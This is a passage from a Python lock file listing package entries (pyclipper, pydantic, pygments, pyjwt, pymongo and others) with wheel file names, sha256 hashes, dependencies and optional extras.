"sha256:46499b361ae067662b22578401d83d57716f3cc0071d592feb07d504b439fea7"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-win32.whl", hash = "sha256:d5c77e39ab05a6cf277c819639968b21e6959e996ea1a074afc24236541708ff"}, {file = "pyclipper-1.3.0.post5-cp311-cp311-win_amd64.whl", hash = "sha256:0f78a1c18ff4f9276f78d9353d6ed4309c3886a9d0172437e48328aef499165e"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:5237282f906049c307e6c90333c7d56f6b8712bf087ef97b141830c40b09ca0a"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:aca8635573646b65c054399433fb3493637f1445db942de8a52fca9ef493ba3d"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1158a2b13d59bdfab33d1d928f7b72c8c7fb8a76e7d2283839cb45d7c0ff2140"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5a041f1a7982b17cf92fd3be349ec41ff1901792149c166bf283f469567b52d6"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-win32.whl", hash = "sha256:bf3a2ccd6e4e078250b0a31a12c519b0be6d1bc160acfceee62407dbd68558f6"}, {file = "pyclipper-1.3.0.post5-cp312-cp312-win_amd64.whl", hash = "sha256:2ce6e0a6ab32182c26537965cf521822cd11a28a7ffcef48635a94c6ca8559ef"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:010ee13d40d924341cc41b6d9901d763175040c68753939f140bc0cc714f18bb"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ee1c4797b1dc982ae9d60333269536ea03ddc0baa1c3383a6d5b741dbbb12675"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:ba692cf11873886085a0445dcfc362b24ca35bcb997ad9e9b5685854a290d8ff"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-win32.whl", hash = "sha256:f0b84fcf5230aca2de06ddb7920459daa858853835f8774739ca30dd516e7d37"}, {file = "pyclipper-1.3.0.post5-cp36-cp36m-win_amd64.whl", hash = "sha256:741910bfd7b0bd40f027869f4bf86bdd9678ae7f74e8dabcf62d170269f6191d"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5f3484b4dffa64f0e3a43b63165a5c0f507c5850e70b9cc2eaa82474d7746393"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:87efec9795744cef786f2f8cab17d6dc07f57dfce5e3b7f3be96eb79a4ce5794"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:5f445a2d03690faa23a1b90e32dfb4352a60b23437323de87388c6c611d3d1e3"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-win32.whl", hash = "sha256:eb9d1cb2999bc1ea8ad1c3a031ba33b0a89a5ace25d33df7529d3ff18c16604c"}, {file = "pyclipper-1.3.0.post5-cp37-cp37m-win_amd64.whl", hash = "sha256:ead0f3ecd1961005f61d50c896e33442138b4e7c9e0c035784d3525068dd2b10"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:39ccd920b192a4f8096589a2a1f8faaf6aaaadb7a163b5ce913d03faac2449bb"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:e346e7adba43e40f5f5f293b6b6a45de5a6a3bdc74e437dedd948c5d74de9405"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bb2fb22927c3ac3191e555efd335c6efa819aa1ff4d0901979673ab5a18eb740"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:a678999d728023f1f3988a14a2e6d89d6f1ed4d0786d5992c1bffb4c1ab30318"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-win32.whl", hash = "sha256:36d456fdf32a6410a87bd7af8ebc4c01f19b4e3b839104b3072558cad0d8bf4c"}, {file = "pyclipper-1.3.0.post5-cp38-cp38-win_amd64.whl", hash = "sha256:c9c1fdf4ecae6b55033ede3f4e931156ffc969334300f44f8bf1b356ec0a3d63"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8bb9cd95fd4bd88fb1590d1763a52e3ea6a1095e11b3e885ff164da1313aae79"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:0f516fd69aa61a9698a3ce3ba2f7edda5ac6aafc8d964ee3bc60897906947fcb"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e36f018303656ea4a629d2fba0d0d4c74960eacec7119fe2ab3c658ce84c494b"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:dd3c4b312a931e668a7a291d4bd5b10bacb0687bd163220a9f0418c7e23169e2"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-win32.whl", hash = "sha256:cfea42972e90954b3c89da9216993373a2270a5103d4916fd543a1109528ed4c"}, {file = "pyclipper-1.3.0.post5-cp39-cp39-win_amd64.whl", hash = "sha256:85ca06f382f999903d809380e4c01ec127d3eb26431402e9b3f01facaec68b80"}, {file = "pyclipper-1.3.0.post5-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:da30e59c684eea198f6e19244e9a41e855a23a416cc708821fd4eb8f5f18626c"}, {file = "pyclipper-1.3.0.post5-pp38-pypy38_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:d8a9e3e46aa50e4c3667db9a816d59ae4f9c62b05f997abb8a9b3f3afe6d94a4"}, {file = "pyclipper-1.3.0.post5-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0589b80f2da1ad322345a93c053b5d46dc692def5a188351be01f34bcf041218"}, {file = "pyclipper-1.3.0.post5.tar.gz", hash = "sha256:c0239f928e0bf78a3efc2f2f615a10bfcdb9f33012d46d64c8d1225b4bde7096"}, ] [[package]] name = "pycparser" version = "2.21" description = "C parser in Python" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "pycparser-2.21-py2.py3-none-any.whl", hash = "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9"}, {file = "pycparser-2.21.tar.gz", hash = "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206"}, ] [[package]] name = "pydantic" version = "1.10.13" description = "Data validation and settings management using python type hints" optional = false python-versions = ">=3.7" files = [ {file = "pydantic-1.10.13-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:efff03cc7a4f29d9009d1c96ceb1e7a70a65cfe86e89d34e4a5f2ab1e5693737"}, {file = "pydantic-1.10.13-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:3ecea2b9d80e5333303eeb77e180b90e95eea8f765d08c3d278cd56b00345d01"}, {file = "pydantic-1.10.13-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1740068fd8e2ef6eb27a20e5651df000978edce6da6803c2bef0bc74540f9548"}, {file = "pydantic-1.10.13-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:84bafe2e60b5e78bc64a2941b4c071a4b7404c5c907f5f5a99b0139781e69ed8"}, {file = "pydantic-1.10.13-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:bc0898c12f8e9c97f6cd44c0ed70d55749eaf783716896960b4ecce2edfd2d69"}, {file = "pydantic-1.10.13-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:654db58ae399fe6434e55325a2c3e959836bd17a6f6a0b6ca8107ea0571d2e17"}, {file = "pydantic-1.10.13-cp310-cp310-win_amd64.whl", hash = "sha256:75ac15385a3534d887a99c713aa3da88a30fbd6204a5cd0dc4dab3d770b9bd2f"}, {file = "pydantic-1.10.13-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:c553f6a156deb868ba38a23cf0df886c63492e9257f60a79c0fd8e7173537653"}, {file = "pydantic-1.10.13-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:5e08865bc6464df8c7d61439ef4439829e3ab62ab1669cddea8dd00cd74b9ffe"}, {file = "pydantic-1.10.13-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e31647d85a2013d926ce60b84f9dd5300d44535a9941fe825dc349ae1f760df9"}, {file = "pydantic-1.10.13-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:210ce042e8f6f7c01168b2d84d4c9eb2b009fe7bf572c2266e235edf14bacd80"}, {file = "pydantic-1.10.13-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:8ae5dd6b721459bfa30805f4c25880e0dd78fc5b5879f9f7a692196ddcb5a580"}, {file = "pydantic-1.10.13-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:f8e81fc5fb17dae698f52bdd1c4f18b6ca674d7068242b2aff075f588301bbb0"}, {file = "pydantic-1.10.13-cp311-cp311-win_amd64.whl", hash = "sha256:61d9dce220447fb74f45e73d7ff3b530e25db30192ad8d425166d43c5deb6df0"}, {file = "pydantic-1.10.13-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:4b03e42ec20286f052490423682016fd80fda830d8e4119f8ab13ec7464c0132"}, {file = "pydantic-1.10.13-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f59ef915cac80275245824e9d771ee939133be38215555e9dc90c6cb148aaeb5"}, {file = "pydantic-1.10.13-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:5a1f9f747851338933942db7af7b6ee8268568ef2ed86c4185c6ef4402e80ba8"}, {file = "pydantic-1.10.13-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:97cce3ae7341f7620a0ba5ef6cf043975cd9d2b81f3aa5f4ea37928269bc1b87"}, {file = "pydantic-1.10.13-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:854223752ba81e3abf663d685f105c64150873cc6f5d0c01d3e3220bcff7d36f"}, {file = "pydantic-1.10.13-cp37-cp37m-win_amd64.whl", hash = "sha256:b97c1fac8c49be29486df85968682b0afa77e1b809aff74b83081cc115e52f33"}, {file = "pydantic-1.10.13-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c958d053453a1c4b1c2062b05cd42d9d5c8eb67537b8d5a7e3c3032943ecd261"}, {file = "pydantic-1.10.13-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4c5370a7edaac06daee3af1c8b1192e305bc102abcbf2a92374b5bc793818599"}, {file = "pydantic-1.10.13-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7d6f6e7305244bddb4414ba7094ce910560c907bdfa3501e9db1a7fd7eaea127"}, {file = "pydantic-1.10.13-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d3a3c792a58e1622667a2837512099eac62490cdfd63bd407993aaf200a4cf1f"}, {file = "pydantic-1.10.13-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:c636925f38b8db208e09d344c7aa4f29a86bb9947495dd6b6d376ad10334fb78"}, {file = "pydantic-1.10.13-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:678bcf5591b63cc917100dc50ab6caebe597ac67e8c9ccb75e698f66038ea953"}, {file = "pydantic-1.10.13-cp38-cp38-win_amd64.whl", hash = "sha256:6cf25c1a65c27923a17b3da28a0bdb99f62ee04230c931d83e888012851f4e7f"}, {file = "pydantic-1.10.13-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8ef467901d7a41fa0ca6db9ae3ec0021e3f657ce2c208e98cd511f3161c762c6"}, {file = "pydantic-1.10.13-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:968ac42970f57b8344ee08837b62f6ee6f53c33f603547a55571c954a4225691"}, {file = "pydantic-1.10.13-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9849f031cf8a2f0a928fe885e5a04b08006d6d41876b8bbd2fc68a18f9f2e3fd"}, {file = "pydantic-1.10.13-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:56e3ff861c3b9c6857579de282ce8baabf443f42ffba355bf070770ed63e11e1"}, {file = "pydantic-1.10.13-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9f00790179497767aae6bcdc36355792c79e7bbb20b145ff449700eb076c5f96"}, {file = "pydantic-1.10.13-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:75b297827b59bc229cac1a23a2f7a4ac0031068e5be0ce385be1462e7e17a35d"}, {file = "pydantic-1.10.13-cp39-cp39-win_amd64.whl", hash = "sha256:e70ca129d2053fb8b728ee7d1af8e553a928d7e301a311094b8a0501adc8763d"}, {file = "pydantic-1.10.13-py3-none-any.whl", hash = "sha256:b87326822e71bd5f313e7d3bfdc77ac3247035ac10b0c0618bd99dcf95b1e687"}, {file = "pydantic-1.10.13.tar.gz", hash = "sha256:32c8b48dcd3b2ac4e78b0ba4af3a2c2eb6048cb75202f0ea7b34feb740efc340"}, ] [package.dependencies] typing-extensions = ">=4.2.0" [package.extras] dotenv = ["python-dotenv (>=0.10.4)"] email = ["email-validator (>=1.0.3)"] [[package]] name = "pydeck" version = "0.8.0" description = "Widget for deck.gl maps" optional = true python-versions = ">=3.7" files = [ {file = "pydeck-0.8.0-py2.py3-none-any.whl", hash = "sha256:a8fa7757c6f24bba033af39db3147cb020eef44012ba7e60d954de187f9ed4d5"}, {file = "pydeck-0.8.0.tar.gz", hash = "sha256:07edde833f7cfcef6749124351195aa7dcd24663d4909fd7898dbd0b6fbc01ec"}, ] [package.dependencies] jinja2 = ">=2.10.1" numpy = ">=1.16.4" [package.extras] carto = ["pydeck-carto"] jupyter = ["ipykernel (>=5.1.2)", "ipython (>=5.8.0)", "ipywidgets (>=7,<8)", "traitlets (>=4.3.2)"] [[package]] name = "pyee" version = "11.0.1" description = "A rough port of Node.js's EventEmitter to Python with a few tricks of its own" optional = false python-versions = ">=3.8" files = [ {file = "pyee-11.0.1-py3-none-any.whl", hash = "sha256:9bcc9647822234f42c228d88de63d0f9ffa881e87a87f9d36ddf5211f6ac977d"}, {file = "pyee-11.0.1.tar.gz", hash = "sha256:a642c51e3885a33ead087286e35212783a4e9b8d6514a10a5db4e57ac57b2b29"}, ] [package.dependencies] typing-extensions = "*" [package.extras] dev = ["black", "flake8", "flake8-black", "isort", "jupyter-console", "mkdocs", "mkdocs-include-markdown-plugin", "mkdocstrings[python]", "pytest", "pytest-asyncio", "pytest-trio", "toml", "tox", "trio", "trio", "trio-typing", "twine", "twisted", "validate-pyproject[all]"] [[package]] name = "pygments" version = "2.16.1" description = "Pygments is a syntax highlighting package written in Python." optional = false python-versions = ">=3.7" files = [ {file = "Pygments-2.16.1-py3-none-any.whl", hash = "sha256:13fc09fa63bc8d8671a6d247e1eb303c4b343eaee81d861f3404db2935653692"}, {file = "Pygments-2.16.1.tar.gz", hash = "sha256:1daff0494820c69bc8941e407aa20f577374ee88364ee10a98fdbe0aece96e29"}, ] [package.extras] plugins = ["importlib-metadata"] [[package]] name = "pyjwt" version = "2.8.0" description = "JSON Web Token implementation in Python" optional = true python-versions = ">=3.7" files = [ {file = "PyJWT-2.8.0-py3-none-any.whl", hash = "sha256:59127c392cc44c2da5bb3192169a91f429924e17aff6534d70fdc02ab3e04320"}, {file = "PyJWT-2.8.0.tar.gz", hash = "sha256:57e28d156e3d5c10088e0c68abb90bfac3df82b40a71bd0daa20c65ccd5c23de"}, ] [package.dependencies] cryptography = {version = ">=3.4.0", optional = true, markers = "extra == \"crypto\""} [package.extras] crypto = ["cryptography (>=3.4.0)"] dev = ["coverage[toml] (==5.0.4)", "cryptography (>=3.4.0)", "pre-commit", "pytest (>=6.0.0,<7.0.0)", "sphinx (>=4.5.0,<5.0.0)", "sphinx-rtd-theme", "zope.interface"] docs = ["sphinx (>=4.5.0,<5.0.0)", "sphinx-rtd-theme", "zope.interface"] tests = ["coverage[toml] (==5.0.4)", "pytest (>=6.0.0,<7.0.0)"] [[package]] name = "pylance" version = "0.5.10" description = "python wrapper for lance-rs" optional = true python-versions = ">=3.8" files = [ {file = "pylance-0.5.10-cp38-abi3-macosx_10_15_x86_64.whl", hash = "sha256:ca5b649fe3adfacaec7680c708fc3a952f6d8b43fd193afdfc5f3e8e13c47b82"}, {file = "pylance-0.5.10-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:a5b47ca4cf91709f0f7cd9f9604c6c9c6efc031f38035c27a7d0a21d9b83f507"}, {file = "pylance-0.5.10-cp38-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9ffa28a110345a6ce191285171b70a13696aa92cb4c1d6318d5444df65ab8025"}, {file = "pylance-0.5.10-cp38-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1d0244faa5b039d6bb0e00d8f27222542c0e86bbf9128b6d8db9e5072ec0ea19"}, {file = "pylance-0.5.10-cp38-abi3-win_amd64.whl", hash = "sha256:92727d6a8f383f16a8e5503d41e2212881fe829b493f6f6aec202c2c7dce7d65"}, ] [package.dependencies] numpy = ">=1.22" pyarrow = ">=10" [package.extras] tests = ["duckdb", "ml_dtypes", "pandas (>=1.4)", "polars[pandas,pyarrow]", "pytest", "tensorflow"] [[package]] name = "pymongo" version = "4.5.0" description = "Python driver for MongoDB <http://www.mongodb.org>" optional = true python-versions = ">=3.7" files = [ {file = "pymongo-4.5.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:2d4fa1b01fa7e5b7bb8d312e3542e211b320eb7a4e3d8dc884327039d93cb9e0"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux1_i686.whl", hash = "sha256:dfcd2b9f510411de615ccedd47462dae80e82fdc09fe9ab0f0f32f11cf57eeb5"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:3e33064f1984db412b34d51496f4ea785a9cff621c67de58e09fb28da6468a52"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_i686.whl", hash = "sha256:33faa786cc907de63f745f587e9879429b46033d7d97a7b84b37f4f8f47b9b32"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_ppc64le.whl", hash = "sha256:76a262c41c1a7cbb84a3b11976578a7eb8e788c4b7bfbd15c005fb6ca88e6e50"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_s390x.whl", hash = "sha256:0f4b125b46fe377984fbaecf2af40ed48b05a4b7676a2ff98999f2016d66b3ec"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:40d5f6e853ece9bfc01e9129b228df446f49316a4252bb1fbfae5c3c9dedebad"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:152259f0f1a60f560323aacf463a3642a65a25557683f49cfa08c8f1ecb2395a"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6d64878d1659d2a5bdfd0f0a4d79bafe68653c573681495e424ab40d7b6d6d41"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f1bb3a62395ffe835dbef3a1cbff48fbcce709c78bd1f52e896aee990928432b"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fe48f50fb6348511a3268a893bfd4ab5f263f5ac220782449d03cd05964d1ae7"}, {file = "pymongo-4.5.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7591a3beea6a9a4fa3080d27d193b41f631130e3ffa76b88c9ccea123f26dc59"}, {file = "pymongo-4.5.0-cp310-cp310-win32.whl", hash = "sha256:3a7166d57dc74d679caa7743b8ecf7dc3a1235a9fd178654dddb2b2a627ae229"}, {file = "pymongo-4.5.0-cp310-cp310-win_amd64.whl", hash = "sha256:21b953da14549ff62ea4ae20889c71564328958cbdf880c64a92a48dda4c9c53"}, {file = "pymongo-4.5.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:ead4f19d0257a756b21ac2e0e85a37a7245ddec36d3b6008d5bfe416525967dc"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9aff6279e405dc953eeb540ab061e72c03cf38119613fce183a8e94f31be608f"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:cd4c8d6aa91d3e35016847cbe8d73106e3d1c9a4e6578d38e2c346bfe8edb3ca"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:08819da7864f9b8d4a95729b2bea5fffed08b63d3b9c15b4fea47de655766cf5"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a253b765b7cbc4209f1d8ee16c7287c4268d3243070bf72d7eec5aa9dfe2a2c2"}, {file = "pymongo-4.5.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8027c9063579083746147cf401a7072a9fb6829678076cd3deff28bb0e0f50c8"}, {file = "pymongo-4.5.0-cp311-cp311-win32.whl", hash = "sha256:9d2346b00af524757576cc2406414562cced1d4349c92166a0ee377a2a483a80"}, {file = "pymongo-4.5.0-cp311-cp311-win_amd64.whl", hash = "sha256:c3c3525ea8658ee1192cdddf5faf99b07ebe1eeaa61bf32821126df6d1b8072b"}, {file = "pymongo-4.5.0-cp312-cp312-macosx_10_9_universal2.whl", hash = "sha256:e5a27f348909235a106a3903fc8e70f573d89b41d723a500869c6569a391cff7"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c9a9a39b7cac81dca79fca8c2a6479ef4c7b1aab95fad7544cc0e8fd943595a2"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:496c9cbcb4951183d4503a9d7d2c1e3694aab1304262f831d5e1917e60386036"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:23cc6d7eb009c688d70da186b8f362d61d5dd1a2c14a45b890bd1e91e9c451f2"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fff7d17d30b2cd45afd654b3fc117755c5d84506ed25fda386494e4e0a3416e1"}, {file = "pymongo-4.5.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6422b6763b016f2ef2beedded0e546d6aa6ba87910f9244d86e0ac7690f75c96"}, {file = "pymongo-4.5.0-cp312-cp312-win32.whl", hash = "sha256:77cfff95c1fafd09e940b3fdcb7b65f11442662fad611d0e69b4dd5d17a81c60"}, {file = "pymongo-4.5.0-cp312-cp312-win_amd64.whl", hash = "sha256:e57d859b972c75ee44ea2ef4758f12821243e99de814030f69a3decb2aa86807"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:2b0176f9233a5927084c79ff80b51bd70bfd57e4f3d564f50f80238e797f0c8a"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:89b3f2da57a27913d15d2a07d58482f33d0a5b28abd20b8e643ab4d625e36257"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:5caee7bd08c3d36ec54617832b44985bd70c4cbd77c5b313de6f7fce0bb34f93"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_i686.whl", hash = "sha256:1d40ad09d9f5e719bc6f729cc6b17f31c0b055029719406bd31dde2f72fca7e7"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_ppc64le.whl", hash = "sha256:076afa0a4a96ca9f77fec0e4a0d241200b3b3a1766f8d7be9a905ecf59a7416b"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_s390x.whl", hash = "sha256:3fa3648e4f1e63ddfe53563ee111079ea3ab35c3b09cd25bc22dadc8269a495f"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:44ee985194c426ddf781fa784f31ffa29cb59657b2dba09250a4245431847d73"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b33c17d9e694b66d7e96977e9e56df19d662031483efe121a24772a44ccbbc7e"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3d79ae3bb1ff041c0db56f138c88ce1dfb0209f3546d8d6e7c3f74944ecd2439"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d67225f05f6ea27c8dc57f3fa6397c96d09c42af69d46629f71e82e66d33fa4f"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:41771b22dd2822540f79a877c391283d4e6368125999a5ec8beee1ce566f3f82"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a1f26bc1f5ce774d99725773901820dfdfd24e875028da4a0252a5b48dcab5c"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:3236cf89d69679eaeb9119c840f5c7eb388a2110b57af6bb6baf01a1da387c18"}, {file = "pymongo-4.5.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:e1f61355c821e870fb4c17cdb318669cfbcf245a291ce5053b41140870c3e5cc"}, {file = "pymongo-4.5.0-cp37-cp37m-win32.whl", hash = "sha256:49dce6957598975d8b8d506329d2a3a6c4aee911fa4bbcf5e52ffc6897122950"}, {file = "pymongo-4.5.0-cp37-cp37m-win_amd64.whl", hash = "sha256:f2227a08b091bd41df5aadee0a5037673f691e2aa000e1968b1ea2342afc6880"}, {file = "pymongo-4.5.0-cp38-cp38-macosx_11_0_universal2.whl", hash = "sha256:435228d3c16a375274ac8ab9c4f9aef40c5e57ddb8296e20ecec9e2461da1017"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux1_i686.whl", hash = "sha256:8e559116e4128630ad3b7e788e2e5da81cbc2344dee246af44471fa650486a70"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:840eaf30ccac122df260b6005f9dfae4ac287c498ee91e3e90c56781614ca238"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:b4fe46b58010115514b842c669a0ed9b6a342017b15905653a5b1724ab80917f"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_i686.whl", hash = "sha256:a8127437ebc196a6f5e8fddd746bd0903a400dc6b5ae35df672dd1ccc7170a2a"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_ppc64le.whl", hash = "sha256:2988ef5e6b360b3ff1c6d55c53515499de5f48df31afd9f785d788cdacfbe2d3"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_s390x.whl", hash = "sha256:e249190b018d63c901678053b4a43e797ca78b93fb6d17633e3567d4b3ec6107"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:1240edc1a448d4ada4bf1a0e55550b6292420915292408e59159fd8bbdaf8f63"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b6d2a56fc2354bb6378f3634402eec788a8f3facf0b3e7d468db5f2b5a78d763"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2a0aade2b11dc0c326ccd429ee4134d2d47459ff68d449c6d7e01e74651bd255"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:74c0da07c04d0781490b2915e7514b1adb265ef22af039a947988c331ee7455b"}, {file = "pymongo-4.5.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 